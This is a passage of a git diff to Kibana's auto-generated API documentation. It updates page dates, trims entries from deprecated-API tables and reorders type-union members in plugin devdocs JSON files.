\"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | 
\"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | \"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | \"data-test-subj\" | \"hidden\" | \"security\" | \"defaultValue\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"translate\" | \"radioGroup\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | \"is\" | \"toastLifeTimeMs\" | \"iconType\" | \"onClose\"> & { title?: string | ", + ", \"children\" | \"onError\" | \"hidden\" | \"color\" | \"className\" | \"onChange\" | \"onKeyDown\" | \"onClick\" | \"security\" | \"defaultValue\" | \"lang\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"style\" | \"tabIndex\" | \"translate\" | \"radioGroup\" | \"role\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | 
\"is\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-label\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onErrorCapture\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | \"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | 
\"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | \"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | 
\"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | \"toastLifeTimeMs\" | \"iconType\" | \"onClose\" | \"data-test-subj\"> & { title?: string | ", "MountPoint", " | undefined; text?: string | ", "MountPoint", diff --git a/api_docs/data_views.mdx b/api_docs/data_views.mdx index 9e62436afe33c..a521d13aa7389 100644 --- a/api_docs/data_views.mdx +++ b/api_docs/data_views.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/dataViews title: "dataViews" image: https://source.unsplash.com/400x175/?github description: API docs for the dataViews plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'dataViews'] --- import dataViewsObj from './data_views.devdocs.json'; diff --git a/api_docs/data_visualizer.mdx b/api_docs/data_visualizer.mdx index be172e288b8b6..2802ac97df0b5 100644 --- a/api_docs/data_visualizer.mdx +++ b/api_docs/data_visualizer.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/dataVisualizer title: "dataVisualizer" image: https://source.unsplash.com/400x175/?github description: API docs for the dataVisualizer plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'dataVisualizer'] --- import dataVisualizerObj from './data_visualizer.devdocs.json'; diff --git a/api_docs/deprecations_by_api.mdx b/api_docs/deprecations_by_api.mdx index af96684e0b49b..c6968e111b533 100644 --- a/api_docs/deprecations_by_api.mdx +++ b/api_docs/deprecations_by_api.mdx 
@@ -7,7 +7,7 @@ id: kibDevDocsDeprecationsByApi slug: /kibana-dev-docs/api-meta/deprecated-api-list-by-api title: Deprecated API usage by API description: A list of deprecated APIs, which plugins are still referencing them, and when they need to be removed by. -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana'] --- @@ -47,7 +47,7 @@ tags: ['contributor', 'dev', 'apidocs', 'kibana'] | | dataViewManagement | - | | | dataViewManagement | - | | | lens, observability, dataVisualizer, fleet, cloudSecurityPosture, discoverEnhanced, osquery, synthetics | - | -| | esUiShared, home, data, spaces, fleet, visualizations, lens, observability, ml, apm, indexLifecycleManagement, synthetics, upgradeAssistant, ux, savedObjectsManagement, kibanaOverview | - | +| | esUiShared, home, data, spaces, fleet, observability, ml, apm, indexLifecycleManagement, synthetics, upgradeAssistant, ux, savedObjectsManagement, kibanaOverview | - | | | management, spaces, ml, canvas, enterpriseSearch, osquery, home | - | | | canvas, visTypeXy | - | | | canvas | - | @@ -72,7 +72,7 @@ tags: ['contributor', 'dev', 'apidocs', 'kibana'] | | apm, security, securitySolution | 8.8.0 | | | visualizations, dashboard, lens, maps, ml, securitySolution, security | 8.8.0 | | | securitySolution | 8.8.0 | -| | savedObjectsTaggingOss, visualizations, dashboard, lens | 8.8.0 | +| | savedObjectsTaggingOss, dashboard | 8.8.0 | | | dashboard | 8.8.0 | | | maps, dashboard | 8.8.0 | | | monitoring, kibanaUsageCollection, @kbn/core-metrics-server-internal | 8.8.0 | diff --git a/api_docs/deprecations_by_plugin.mdx b/api_docs/deprecations_by_plugin.mdx index b0a9f410ca204..7614694432f40 100644 --- a/api_docs/deprecations_by_plugin.mdx +++ b/api_docs/deprecations_by_plugin.mdx 
@@ -7,7 +7,7 @@ id: kibDevDocsDeprecationsByPlugin slug: /kibana-dev-docs/api-meta/deprecated-api-list-by-plugin title: Deprecated API usage by plugin description: A list of deprecated APIs, which plugins are still referencing them, and when they need to be removed by. -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana'] --- 
@@ -355,8 +355,6 @@ so TS and code-reference navigation might not highlight them. | | Deprecated API | Reference location(s) | Remove By | | ---------------|-----------|-----------| | | [lens_top_nav.tsx](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/app_plugin/lens_top_nav.tsx#:~:text=indexPatternId) | - | -| | [workspace_panel.tsx](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/editor_frame_service/editor_frame/workspace_panel/workspace_panel.tsx#:~:text=RedirectAppLinks), [workspace_panel.tsx](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/editor_frame_service/editor_frame/workspace_panel/workspace_panel.tsx#:~:text=RedirectAppLinks), [workspace_panel.tsx](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/editor_frame_service/editor_frame/workspace_panel/workspace_panel.tsx#:~:text=RedirectAppLinks) | - | -| | [display_duplicate_title_confirm_modal.ts](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/persistence/saved_objects_utils/display_duplicate_title_confirm_modal.ts#:~:text=SavedObject), [display_duplicate_title_confirm_modal.ts](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/persistence/saved_objects_utils/display_duplicate_title_confirm_modal.ts#:~:text=SavedObject), [check_for_duplicate_title.ts](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/persistence/saved_objects_utils/check_for_duplicate_title.ts#:~:text=SavedObject), [check_for_duplicate_title.ts](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/persistence/saved_objects_utils/check_for_duplicate_title.ts#:~:text=SavedObject) | 8.8.0 | | | [types.ts](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/app_plugin/types.ts#:~:text=onAppLeave), [types.ts](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/app_plugin/types.ts#:~:text=onAppLeave), 
[mounter.tsx](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/app_plugin/mounter.tsx#:~:text=onAppLeave) | 8.8.0 | 
@@ -693,8 +691,6 @@ migrates to using the Kibana Privilege model: https://github.com/elastic/kibana/ | Deprecated API | Reference location(s) | Remove By | | ---------------|-----------|-----------| -| | [get_table_columns.tsx](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/visualize_app/utils/get_table_columns.tsx#:~:text=RedirectAppLinks), [get_table_columns.tsx](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/visualize_app/utils/get_table_columns.tsx#:~:text=RedirectAppLinks), [get_table_columns.tsx](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/visualize_app/utils/get_table_columns.tsx#:~:text=RedirectAppLinks) | - | -| | [display_duplicate_title_confirm_modal.ts](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/utils/saved_objects_utils/display_duplicate_title_confirm_modal.ts#:~:text=SavedObject), [display_duplicate_title_confirm_modal.ts](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/utils/saved_objects_utils/display_duplicate_title_confirm_modal.ts#:~:text=SavedObject), [check_for_duplicate_title.ts](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/utils/saved_objects_utils/check_for_duplicate_title.ts#:~:text=SavedObject), [check_for_duplicate_title.ts](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/utils/saved_objects_utils/check_for_duplicate_title.ts#:~:text=SavedObject) | 8.8.0 | | | [visualize_top_nav.tsx](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/visualize_app/components/visualize_top_nav.tsx#:~:text=onAppLeave), [visualize_editor_common.tsx](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/visualize_app/components/visualize_editor_common.tsx#:~:text=onAppLeave), 
[app.tsx](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/visualize_app/app.tsx#:~:text=onAppLeave), [index.tsx](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/visualize_app/index.tsx#:~:text=onAppLeave) | 8.8.0 | diff --git a/api_docs/deprecations_by_team.mdx b/api_docs/deprecations_by_team.mdx index 15bf0dc01f1e8..23a8791ccc759 100644 --- a/api_docs/deprecations_by_team.mdx +++ b/api_docs/deprecations_by_team.mdx @@ -7,7 +7,7 @@ id: kibDevDocsDeprecationsDueByTeam slug: /kibana-dev-docs/api-meta/deprecations-due-by-team title: Deprecated APIs due to be removed, by team description: Lists the teams that are referencing deprecated APIs with a remove by date. -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana'] --- 
@@ -190,6 +190,5 @@ migrates to using the Kibana Privilege model: https://github.com/elastic/kibana/ | Plugin | Deprecated API | Reference location(s) | Remove By | | --------|-------|-----------|-----------| -| lens | | [display_duplicate_title_confirm_modal.ts](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/persistence/saved_objects_utils/display_duplicate_title_confirm_modal.ts#:~:text=SavedObject), [display_duplicate_title_confirm_modal.ts](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/persistence/saved_objects_utils/display_duplicate_title_confirm_modal.ts#:~:text=SavedObject), [check_for_duplicate_title.ts](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/persistence/saved_objects_utils/check_for_duplicate_title.ts#:~:text=SavedObject), [check_for_duplicate_title.ts](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/persistence/saved_objects_utils/check_for_duplicate_title.ts#:~:text=SavedObject), [display_duplicate_title_confirm_modal.ts](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/utils/saved_objects_utils/display_duplicate_title_confirm_modal.ts#:~:text=SavedObject), [display_duplicate_title_confirm_modal.ts](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/utils/saved_objects_utils/display_duplicate_title_confirm_modal.ts#:~:text=SavedObject), [check_for_duplicate_title.ts](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/utils/saved_objects_utils/check_for_duplicate_title.ts#:~:text=SavedObject), [check_for_duplicate_title.ts](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/utils/saved_objects_utils/check_for_duplicate_title.ts#:~:text=SavedObject) | 8.8.0 | | lens | | [types.ts](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/app_plugin/types.ts#:~:text=onAppLeave), 
[types.ts](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/app_plugin/types.ts#:~:text=onAppLeave), [mounter.tsx](https://github.com/elastic/kibana/tree/master/x-pack/plugins/lens/public/app_plugin/mounter.tsx#:~:text=onAppLeave), [visualize_top_nav.tsx](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/visualize_app/components/visualize_top_nav.tsx#:~:text=onAppLeave), [visualize_editor_common.tsx](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/visualize_app/components/visualize_editor_common.tsx#:~:text=onAppLeave), [app.tsx](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/visualize_app/app.tsx#:~:text=onAppLeave), [index.tsx](https://github.com/elastic/kibana/tree/master/src/plugins/visualizations/public/visualize_app/index.tsx#:~:text=onAppLeave) | 8.8.0 | | management | | [application.tsx](https://github.com/elastic/kibana/tree/master/src/plugins/management/public/application.tsx#:~:text=appBasePath) | 8.8.0 | \ No newline at end of file diff --git a/api_docs/dev_tools.mdx b/api_docs/dev_tools.mdx index 8623627c9eafd..fe4a8f7fb1b48 100644 --- a/api_docs/dev_tools.mdx +++ b/api_docs/dev_tools.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/devTools title: "devTools" image: https://source.unsplash.com/400x175/?github description: API docs for the devTools plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'devTools'] --- import devToolsObj from './dev_tools.devdocs.json'; diff --git a/api_docs/discover.mdx b/api_docs/discover.mdx index 554ebb7922a9c..d3d34b75e18b4 100644 --- a/api_docs/discover.mdx +++ b/api_docs/discover.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/discover title: "discover" image: https://source.unsplash.com/400x175/?github description: API docs for the discover plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'discover'] --- import discoverObj from './discover.devdocs.json'; diff --git a/api_docs/discover_enhanced.mdx b/api_docs/discover_enhanced.mdx index 555a68939586c..debc000f91cf8 100644 --- a/api_docs/discover_enhanced.mdx +++ b/api_docs/discover_enhanced.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/discoverEnhanced title: "discoverEnhanced" image: https://source.unsplash.com/400x175/?github description: API docs for the discoverEnhanced plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'discoverEnhanced'] --- import discoverEnhancedObj from './discover_enhanced.devdocs.json'; diff --git a/api_docs/elastic_apm_synthtrace.mdx b/api_docs/elastic_apm_synthtrace.mdx index 5cd02bc034e8e..20db74caf8ea0 100644 --- a/api_docs/elastic_apm_synthtrace.mdx +++ b/api_docs/elastic_apm_synthtrace.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/elastic-apm-synthtrace title: "@elastic/apm-synthtrace" image: https://source.unsplash.com/400x175/?github description: API docs for the @elastic/apm-synthtrace plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@elastic/apm-synthtrace'] --- import elasticApmSynthtraceObj from './elastic_apm_synthtrace.devdocs.json'; diff --git a/api_docs/embeddable.mdx b/api_docs/embeddable.mdx index 7f6752b844c5b..44b34351db15e 100644 --- a/api_docs/embeddable.mdx +++ b/api_docs/embeddable.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/embeddable title: "embeddable" image: https://source.unsplash.com/400x175/?github description: API docs for the embeddable plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'embeddable'] --- import embeddableObj from './embeddable.devdocs.json'; 
diff --git a/api_docs/embeddable_enhanced.mdx b/api_docs/embeddable_enhanced.mdx index d71fc3d7a5a8b..f2ebec2b2a4b3 100644 --- a/api_docs/embeddable_enhanced.mdx +++ b/api_docs/embeddable_enhanced.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/embeddableEnhanced title: "embeddableEnhanced" image: https://source.unsplash.com/400x175/?github description: API docs for the embeddableEnhanced plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'embeddableEnhanced'] --- import embeddableEnhancedObj from './embeddable_enhanced.devdocs.json'; diff --git a/api_docs/encrypted_saved_objects.mdx b/api_docs/encrypted_saved_objects.mdx index 334ea7d608dd6..9c9b7e58e1623 100644 --- a/api_docs/encrypted_saved_objects.mdx +++ b/api_docs/encrypted_saved_objects.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/encryptedSavedObjects title: "encryptedSavedObjects" image: https://source.unsplash.com/400x175/?github description: API docs for the encryptedSavedObjects plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'encryptedSavedObjects'] --- import encryptedSavedObjectsObj from './encrypted_saved_objects.devdocs.json'; diff --git a/api_docs/enterprise_search.mdx b/api_docs/enterprise_search.mdx index 6d8c6670d585a..eccccd8e0c8f3 100644 --- a/api_docs/enterprise_search.mdx +++ b/api_docs/enterprise_search.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/enterpriseSearch title: "enterpriseSearch" image: https://source.unsplash.com/400x175/?github description: API docs for the enterpriseSearch plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'enterpriseSearch'] --- import enterpriseSearchObj from './enterprise_search.devdocs.json'; diff --git a/api_docs/es_ui_shared.devdocs.json b/api_docs/es_ui_shared.devdocs.json index 18fe88540dc40..8cf1ece3e2dbd 100644 --- a/api_docs/es_ui_shared.devdocs.json +++ b/api_docs/es_ui_shared.devdocs.json 
@@ -1215,7 +1215,7 @@ "label": "method", "description": [], "signature": [ - "\"get\" | \"delete\" | \"post\" | \"put\" | \"patch\" | \"head\"" + "\"get\" | \"post\" | \"put\" | \"delete\" | \"patch\" | \"head\"" ], "path": "src/plugins/es_ui_shared/public/request/send_request.ts", "deprecated": false diff --git a/api_docs/es_ui_shared.mdx b/api_docs/es_ui_shared.mdx index 0e1cc17c66384..a6169ade9a7f0 100644 --- a/api_docs/es_ui_shared.mdx +++ b/api_docs/es_ui_shared.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/esUiShared title: "esUiShared" image: https://source.unsplash.com/400x175/?github description: API docs for the esUiShared plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'esUiShared'] --- import esUiSharedObj from './es_ui_shared.devdocs.json'; diff --git a/api_docs/event_annotation.devdocs.json b/api_docs/event_annotation.devdocs.json index 44dbbcb93afdb..45958ad9a1352 100644 --- a/api_docs/event_annotation.devdocs.json +++ b/api_docs/event_annotation.devdocs.json @@ -373,7 +373,7 @@ "label": "AvailableAnnotationIcon", "description": [], "signature": [ - "\"alert\" | \"circle\" | \"asterisk\" | \"bell\" | \"bolt\" | \"bug\" | \"editorComment\" | \"flag\" | \"heart\" | \"mapMarker\" | \"pinFilled\" | \"starEmpty\" | \"tag\" | \"triangle\"" + "\"circle\" | \"asterisk\" | \"alert\" | \"bell\" | \"bolt\" | \"bug\" | \"editorComment\" | \"flag\" | \"heart\" | \"mapMarker\" | \"pinFilled\" | \"starEmpty\" | \"tag\" | \"triangle\"" ], "path": "src/plugins/event_annotation/common/types.ts", "deprecated": false, 
@@ -847,7 +847,7 @@ "label": "options", "description": [], "signature": [ - "(\"alert\" | \"circle\" | \"asterisk\" | \"bell\" | \"bolt\" | \"bug\" | \"editorComment\" | \"flag\" | \"heart\" | \"mapMarker\" | \"pinFilled\" | \"starEmpty\" | \"tag\" | \"triangle\")[]" + "(\"circle\" | \"asterisk\" | \"alert\" | \"bell\" | \"bolt\" | \"bug\" | \"editorComment\" | \"flag\" | \"heart\" | \"mapMarker\" | \"pinFilled\" | \"starEmpty\" | \"tag\" | \"triangle\")[]" ], "path": "src/plugins/event_annotation/common/manual_event_annotation/index.ts", "deprecated": false diff --git a/api_docs/event_annotation.mdx b/api_docs/event_annotation.mdx index a58d2ee63b8c2..c81c793c6bc06 100644 --- a/api_docs/event_annotation.mdx +++ b/api_docs/event_annotation.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/eventAnnotation title: "eventAnnotation" image: https://source.unsplash.com/400x175/?github description: API docs for the eventAnnotation plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'eventAnnotation'] --- import eventAnnotationObj from './event_annotation.devdocs.json'; diff --git a/api_docs/event_log.devdocs.json b/api_docs/event_log.devdocs.json index c31770f76221c..ec9ab9ec49812 100644 --- a/api_docs/event_log.devdocs.json +++ b/api_docs/event_log.devdocs.json 
@@ -1123,7 +1123,7 @@ "label": "data", "description": [], "signature": [ - "(Readonly<{ error?: Readonly<{ type?: string | undefined; id?: string | undefined; message?: string | undefined; code?: string | undefined; stack_trace?: string | undefined; } & {}> | undefined; log?: Readonly<{ logger?: string | undefined; level?: string | undefined; } & {}> | undefined; user?: Readonly<{ name?: string | undefined; } & {}> | undefined; message?: string | undefined; tags?: string[] | undefined; kibana?: Readonly<{ version?: string | undefined; alert?: Readonly<{ rule?: Readonly<{ consumer?: string | undefined; execution?: Readonly<{ status?: string | undefined; metrics?: Readonly<{ number_of_triggered_actions?: string | number | undefined; number_of_generated_actions?: string | number | undefined; alert_counts?: Readonly<{ recovered?: string | number | undefined; active?: string | number | undefined; new?: string | number | undefined; } & {}> | undefined; number_of_searches?: string | number | undefined; total_indexing_duration_ms?: string | number | undefined; es_search_duration_ms?: string | number | undefined; total_search_duration_ms?: string | number | undefined; execution_gap_duration_s?: string | number | undefined; } & {}> | undefined; uuid?: string | undefined; status_order?: string | number | undefined; } & {}> | undefined; rule_type_id?: string | undefined; } & {}> | undefined; } & {}> | undefined; alerting?: Readonly<{ status?: string | undefined; instance_id?: string | undefined; action_group_id?: string | undefined; action_subgroup?: string | undefined; } & {}> | undefined; server_uuid?: string | undefined; task?: Readonly<{ id?: string | undefined; schedule_delay?: string | number | undefined; scheduled?: string | undefined; } & {}> | undefined; saved_objects?: Readonly<{ type?: string | undefined; id?: string | undefined; namespace?: string | undefined; rel?: string | undefined; type_id?: string | undefined; } & {}>[] | undefined; space_ids?: string[] | 
undefined; } & {}> | undefined; ecs?: Readonly<{ version?: string | undefined; } & {}> | undefined; rule?: Readonly<{ id?: string | undefined; name?: string | undefined; version?: string | undefined; description?: string | undefined; license?: string | undefined; category?: string | undefined; reference?: string | undefined; author?: string[] | undefined; ruleset?: string | undefined; uuid?: string | undefined; } & {}> | undefined; event?: Readonly<{ start?: string | undefined; type?: string[] | undefined; id?: string | undefined; end?: string | undefined; original?: string | undefined; outcome?: string | undefined; created?: string | undefined; category?: string[] | undefined; duration?: string | number | undefined; code?: string | undefined; url?: string | undefined; action?: string | undefined; kind?: string | undefined; hash?: string | undefined; severity?: string | number | undefined; dataset?: string | undefined; ingested?: string | undefined; module?: string | undefined; provider?: string | undefined; reason?: string | undefined; reference?: string | undefined; risk_score?: number | undefined; risk_score_norm?: number | undefined; sequence?: string | number | undefined; timezone?: string | undefined; } & {}> | undefined; '@timestamp'?: string | undefined; } & {}> | undefined)[]" + "(Readonly<{ error?: Readonly<{ type?: string | undefined; message?: string | undefined; id?: string | undefined; code?: string | undefined; stack_trace?: string | undefined; } & {}> | undefined; tags?: string[] | undefined; log?: Readonly<{ logger?: string | undefined; level?: string | undefined; } & {}> | undefined; user?: Readonly<{ name?: string | undefined; } & {}> | undefined; message?: string | undefined; kibana?: Readonly<{ alert?: Readonly<{ rule?: Readonly<{ consumer?: string | undefined; execution?: Readonly<{ status?: string | undefined; metrics?: Readonly<{ number_of_triggered_actions?: string | number | undefined; number_of_generated_actions?: string | number | 
